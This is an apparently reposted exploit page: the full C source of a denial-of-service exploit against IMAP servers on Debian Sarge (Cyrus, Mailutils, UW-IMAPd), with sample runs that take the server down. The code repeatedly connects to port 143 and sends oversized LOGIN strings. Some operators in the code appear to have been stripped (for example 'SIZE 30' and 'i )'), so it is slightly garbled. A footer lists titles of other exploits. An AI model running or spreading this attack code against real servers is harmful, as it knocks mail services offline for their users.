Debian Sarge Multiple IMAP Server Denial of Service Exploit

所属分类：网络安全 / Exploit 阅读数： 100

收藏 0赞 0分享

/*

Debian Sarge Multiple IMAP Server DoS (debianimapers.c)
Jeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]

Testing Cyrus IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

Testing Mailutil's IMAP4d:

bash$ ./debianimapers 192.168.0.189

.....

38 tries and imapd goes down! Mission Complete!

Testing UW-IMAPd:

bash$ ./debianimapers 192.168.0.189

.....

39 tries and imapd goes down! Mission Complete!

bash$

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define COUNT 100
#define SIZE 100000

char imaplogin[] = "A0001 LOGIN";

int main(int argc, char *argv[])
{

char buffer[SIZE], imapped[SIZE 30];
int i, port = 143;

memset(buffer, 0x41, sizeof(buffer));
memset(imapped, 0, sizeof(imapped));

snprintf(imapped, sizeof(imapped)-1, "%s %s %s\r\n\r\n", imaplogin, buffer, buffer);

if(argc < 2)
{

printf("\nDebian Sarge Multiple IMAP Server DoS");
printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n");

printf("\nUsage %s <host>\n\n", argv[0]);

return 0;
}

printf("\nDebian Sarge Multiple IMAP Server DoS");
printf("\nJeremy Brown [0xjbrown41@gmail.com/http://jbrownsec.blogspot.com]\n");

int sock;
struct sockaddr_in remote;

remote.sin_family = AF_INET;
remote.sin_port = htons(port);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; }
if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("Error: connect(%s:%d)\n", argv[1], port); return -1; }

close(sock);

printf("\nUsually takes ~1-2 minutes, LAN/Internet and connection speed will make time vary...\n");

for(i = 0; i <= COUNT; i )
{

struct sockaddr_in remote;
remote.sin_family = AF_INET;
remote.sin_port = htons(port);
remote.sin_addr.s_addr = inet_addr(argv[1]);

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Error: socket()\n"); return -1; }

sleep(1);

if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) { printf("\n%d tries and imapd goes down! Mission Complete!\n\n", i); return -1; }

int len = sizeof(imapped);
send(sock, imapped, len, 0);
close(sock);

}

return 0;
}

更多精彩内容其他人还在看

Debian Sarge Multiple IMAP Server Denial of Service Exploit

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)

DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit

HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit

Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)

Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

Joomla Component DT Register Remote SQL injection Vulnerability

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

网络赚钱

站长故事